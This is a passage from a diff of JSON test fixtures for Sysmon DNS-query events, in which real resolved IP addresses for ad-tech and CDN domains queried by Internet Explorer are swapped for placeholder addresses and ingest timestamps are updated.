tg3.dr.socdm.com;::ffff:124.146.215.43;::ffff:202.241.208.53;::ffff:124.146.215.46;::ffff:202.241.208.52;::ffff:124.146.215.48;::ffff:124.146.215.45;::ffff:202.241.208.54;::ffff:124.146.215.47;::ffff:124.146.215.42;::ffff:124.146.215.44;::ffff:202.241.208.55;::ffff:202.241.208.56;192.5.6.30;2001:503:a83e::2:30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:09.067835500Z'/\u003e\u003cEventRecordID\u003e197\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:08.619\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003etg.socdm.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 tg3.dr.socdm.com;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:09.067Z", @@ -18705,12 +18450,12 @@ "type": "CNAME" }, { - "data": "68.67.153.75", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "68.67.153.75" + "89.160.20.156" ] }, "network": { @@ -18726,13 +18471,13 @@ "prebid.adnxs.com" ], "ip": [ - "68.67.153.75" + "89.160.20.156" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313967420Z", + "ingested": "2021-12-09T13:49:44.739962900Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:09.067845000Z'/\u003e\u003cEventRecordID\u003e198\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:08.620\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eprebid.adnxs.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 prebid.appnexusgslb.net;::ffff:68.67.153.75;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:09.067845000Z'/\u003e\u003cEventRecordID\u003e198\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:08.620\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eprebid.adnxs.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 prebid.appnexusgslb.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:09.067Z", @@ -18804,12 +18549,12 @@ "type": "CNAME" }, { - "data": "204.154.111.122", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "204.154.111.122" + "89.160.20.156" ] }, "network": { @@ -18827,13 +18572,13 @@ "ul1.dvtps.com" ], "ip": [ - "204.154.111.122" + "89.160.20.156" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313968727Z", + "ingested": "2021-12-09T13:49:44.739966700Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:09.067883500Z'/\u003e\u003cEventRecordID\u003e199\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:08.811\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eul1.dvtps.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 tps.doubleverify.com;type: 5 tps-geo.dvgtm.akadns.net;type: 5 nycp-hlb.dvgtm.akadns.net;::ffff:204.154.111.122;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:09.067883500Z'/\u003e\u003cEventRecordID\u003e199\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:08.811\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eul1.dvtps.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 tps.doubleverify.com;type: 5 tps-geo.dvgtm.akadns.net;type: 5 nycp-hlb.dvgtm.akadns.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:09.067Z", @@ -18905,7 +18650,7 @@ ] }, "event": { - "ingested": "2021-10-14T04:10:32.313970062Z", + "ingested": "2021-12-09T13:49:44.739971300Z", "code": "22", "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:09.067946300Z'/\u003e\u003cEventRecordID\u003e200\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:08.912\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eul1.dvtps.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e9701\u003c/Data\u003e\u003cData Name='QueryResults'\u003e\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", @@ -18975,12 +18720,12 @@ "type": "CNAME" }, { - "data": "23.3.125.199", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "23.3.125.199" + "89.160.20.156" ] }, "network": { @@ -18997,13 +18742,13 @@ "tags.bluekai.com" ], "ip": [ - "23.3.125.199" + "89.160.20.156" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313971308Z", + "ingested": "2021-12-09T13:49:44.739977200Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:09.068003400Z'/\u003e\u003cEventRecordID\u003e201\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:09.016\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003etags.bluekai.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 tags.bluekai.com.edgekey.net;type: 5 e13541.x.akamaiedge.net;::ffff:23.3.125.199;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:09.068003400Z'/\u003e\u003cEventRecordID\u003e201\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:09.016\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003etags.bluekai.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 tags.bluekai.com.edgekey.net;type: 5 e13541.x.akamaiedge.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:09.068Z", @@ -19063,27 +18808,27 @@ }, "answers": [ { - "data": "104.19.195.151", + "data": "89.160.20.156", "type": "A" }, { - "data": "104.19.199.151", + "data": "89.160.20.156", "type": "A" }, { - "data": "104.19.198.151", + "data": "89.160.20.156", "type": "A" }, { - "data": "104.19.197.151", + "data": "89.160.20.156", "type": "A" }, { - "data": "104.19.196.151", + "data": "89.160.20.156", "type": "A" }, { - "data": "192.5.6.30", + "data": "192.168.6.30", "type": "A" }, { @@ -19091,7 +18836,7 @@ "type": "AAAA" }, { - "data": "192.33.14.30", + "data": "192.168.14.30", "type": "A" }, { @@ -19099,7 +18844,7 @@ "type": "AAAA" }, { - "data": "192.26.92.30", + "data": "192.168.92.30", "type": "A" }, { @@ -19107,23 +18852,23 @@ "type": "AAAA" }, { - "data": "192.31.80.30", + "data": "192.168.80.30", "type": "A" } ], "resolved_ip": [ - "104.19.195.151", - "104.19.199.151", - "104.19.198.151", - "104.19.197.151", - "104.19.196.151", - "192.5.6.30", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30" + "192.168.80.30" ] }, "network": { @@ -19138,24 +18883,20 @@ "cdnjs.cloudflare.com" ], "ip": [ - "104.19.195.151", - "104.19.199.151", - "104.19.198.151", - "104.19.197.151", - "104.19.196.151", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30" + "192.168.80.30" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313972676Z", + "ingested": "2021-12-09T13:49:44.739980800Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:10.067467200Z'/\u003e\u003cEventRecordID\u003e202\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:09.048\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ecdnjs.cloudflare.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:104.19.195.151;::ffff:104.19.199.151;::ffff:104.19.198.151;::ffff:104.19.197.151;::ffff:104.19.196.151;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:10.067467200Z'/\u003e\u003cEventRecordID\u003e202\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:09.048\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ecdnjs.cloudflare.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:10.067Z", @@ -19215,23 +18956,23 @@ }, "answers": [ { - "data": "85.194.243.23", + "data": "89.160.20.156", "type": "A" }, { - "data": "85.194.243.239", + "data": "89.160.20.156", "type": "A" }, { - "data": "85.194.240.137", + "data": "89.160.20.156", "type": "A" }, { - "data": "85.194.242.103", + "data": "89.160.20.156", "type": "A" }, { - "data": "192.5.6.30", + "data": "192.168.6.30", "type": "A" }, { @@ -19239,7 +18980,7 @@ "type": "AAAA" }, { - "data": "192.33.14.30", + "data": "192.168.14.30", "type": "A" }, { @@ -19247,7 +18988,7 @@ "type": "AAAA" }, { - "data": "192.26.92.30", + "data": "192.168.92.30", "type": "A" }, { @@ -19255,7 +18996,7 @@ "type": "AAAA" }, { - "data": "192.31.80.30", + "data": "192.168.80.30", "type": "A" }, { @@ -19264,17 +19005,17 @@ } ], "resolved_ip": [ - "85.194.243.23", - "85.194.243.239", - "85.194.240.137", - "85.194.242.103", - "192.5.6.30", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30", + "192.168.80.30", "2001:500:856e::30" ] }, @@ -19290,24 +19031,21 @@ "pixel.onaudience.com" ], "ip": [ - "85.194.243.23", - "85.194.243.239", - "85.194.240.137", - "85.194.242.103", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30", + "192.168.80.30", "2001:500:856e::30" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313973932Z", + "ingested": "2021-12-09T13:49:44.740019100Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:10.067488100Z'/\u003e\u003cEventRecordID\u003e203\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:09.051\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003epixel.onaudience.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:85.194.243.23;::ffff:85.194.243.239;::ffff:85.194.240.137;::ffff:85.194.242.103;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:10.067488100Z'/\u003e\u003cEventRecordID\u003e203\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:09.051\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003epixel.onaudience.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:10.067Z", @@ -19375,12 +19113,12 @@ "type": "CNAME" }, { - "data": "72.21.91.29", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "72.21.91.29" + "89.160.20.156" ] }, "network": { @@ -19397,13 +19135,13 @@ "status.geotrust.com" ], "ip": [ - "72.21.91.29" + "89.160.20.156" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313975198Z", + "ingested": "2021-12-09T13:49:44.740026200Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:10.067504600Z'/\u003e\u003cEventRecordID\u003e204\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' 